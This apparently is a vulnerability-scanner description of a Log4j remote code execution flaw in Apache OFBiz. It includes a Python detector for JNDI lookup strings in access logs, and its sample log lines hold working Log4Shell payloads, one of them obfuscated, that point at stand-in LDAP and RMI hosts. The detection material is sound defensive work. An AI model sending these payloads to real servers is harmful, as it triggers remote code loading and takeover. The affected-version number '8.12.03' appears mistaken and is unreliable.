Apache OFBiz Remote Code Execution Scanner

Detects the 'Remote Code Execution (RCE)' vulnerability in Apache OFBiz, affecting versions prior to 8.12.03. This scanner helps identify potential RCE flaws associated with the Apache Log4j library used by Apache OFBiz.

Short Info

Level: Critical
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 26 days 9 hours
Scan only one: Domain, IPv4, Subdomain
Toolbox: -

Apache OFBiz is an open-source enterprise resource planning (ERP) system used by various companies to manage their business processes, including finance, human resources, and order processing. It is utilized by organizations that require a flexible ERP system due to its modular architecture and comprehensive functionalities. As a server-side application, it allows businesses to scale and manage operations efficiently. Apache OFBiz integrates numerous features that can be customized according to specific needs, making it ideal for mid-sized and large enterprises. Developed by the Apache Foundation, OFBiz benefits from a large community of contributors and developers, ensuring continuous improvement and support. It is widely adopted across various industries for its cost-effectiveness and comprehensive suite of tools.

The Remote Code Execution (RCE) vulnerability detected in Apache OFBiz is caused by a flaw in the Apache Log4j library. The issue arises due to insufficient protections on message lookup substitutions when handling user-controlled input. This vulnerability can be exploited remotely by an unauthenticated attacker who can send a specially crafted request to the server. It allows the attacker to execute arbitrary code on the host machine with the permission level of the running Java process. The severity of this vulnerability is critical, given the potential for unauthorized control over the entire application server. This vulnerability affects all OFBiz versions using vulnerable versions of the Log4j library before specific patches were applied.

In this RCE vulnerability, the attacker can exploit the Apache Log4j component used in Apache OFBiz by using JNDI lookups in log messages to have it fetch remote Java classes, thus potentially executing arbitrary code. The vulnerable endpoint is often a web endpoint accepting user input in loggable fields. A threat actor can manipulate log formats by crafting a malicious payload that triggers the JNDI lookup expression through specific parameters in a web request. This payload can be delivered via HTTP cookies or other input areas logged by OFBiz, leveraging the logging infrastructure's default behavior in the vulnerable Log4j versions.
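As an added illustration of the detection side (this is not code from the scanner or from the OFBiz project), the logged request fields mentioned above can be checked for Log4j lookup expressions after the nested `${...}` lookups are normalized, because a plain substring match for `jndi:` misses nested forms such as `${${lower:j}ndi:...}`. The log lines and addresses below are constructed sample data.

```python
import re
from typing import List

# Innermost ${...} lookup: a body that contains no further braces.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def resolve_lookup(body: str) -> str:
    """Approximate how Log4j 2 resolves one innermost lookup for normalization purposes:
    ${lower:x} -> x lowercased, ${upper:x} -> x uppercased, any other (failed) lookup
    falls back to its ':-default' part, or to an empty string when none is given."""
    key, _, default = body.partition(":-")
    lowered = key.lower()
    if lowered.startswith("lower:"):
        return key[6:].lower()
    if lowered.startswith("upper:"):
        return key[6:].upper()
    return default


def contains_jndi_lookup(text: str, max_rounds: int = 20) -> bool:
    """True if the text resolves to a ${jndi:...} lookup once nested lookups are collapsed.
    Each round replaces every innermost lookup, so the brace count strictly shrinks."""
    for _ in range(max_rounds):
        bodies = INNER_LOOKUP.findall(text)
        if not bodies:
            return False
        # Lookup prefixes are matched case-insensitively by Log4j's interpolator.
        if any(b.lower().startswith("jndi:") for b in bodies):
            return True
        text = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
    return False


def find_suspicious_lines(lines: List[str]) -> List[int]:
    """Indexes of access-log lines whose logged fields carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if contains_jndi_lookup(line)]


# Constructed sample access-log lines (user-agent and cookie fields are quoted at the end).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET /webtools/control/main HTTP/1.1" 200 "Mozilla/5.0" "OFBiz.Visitor=abc123"',
    '10.0.0.7 - - [10/Dec/2021:10:12:03 +0000] "GET /webtools/control/main HTTP/1.1" 200 "${jndi:ldap://198.51.100.9/a}" "-"',
    '10.0.0.9 - - [10/Dec/2021:10:12:05 +0000] "GET /accounting/control/main HTTP/1.1" 200 "Mozilla/5.0" "sid=${${lower:j}ndi:rmi://203.0.113.4/x}"',
    '10.0.0.11 - - [10/Dec/2021:10:12:07 +0000] "GET /catalog/control/main HTTP/1.1" 200 "Mozilla/5.0" "price=${date:yyyy}"',
]

if __name__ == "__main__":
    for idx in find_suspicious_lines(SAMPLE_LOG_LINES):
        print("suspicious:", SAMPLE_LOG_LINES[idx])
```

The fourth sample line shows why the check keys on the resolved `jndi:` prefix rather than on `${` alone: a harmless `${date:...}` lookup is not flagged.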

When this RCE vulnerability is exploited, an attacker could gain control over the affected system, leading to potential breaches, data theft, or further propagation within the network. The consequences of this could include unauthorized access to sensitive data, disruption of business operations, and severe financial liabilities. Moreover, the attacker could use the compromised system as a launch point for attacks against other systems in the network, resulting in a broader security incident. Organizations relying on Apache OFBiz are urged to address this vulnerability promptly to protect their infrastructure.
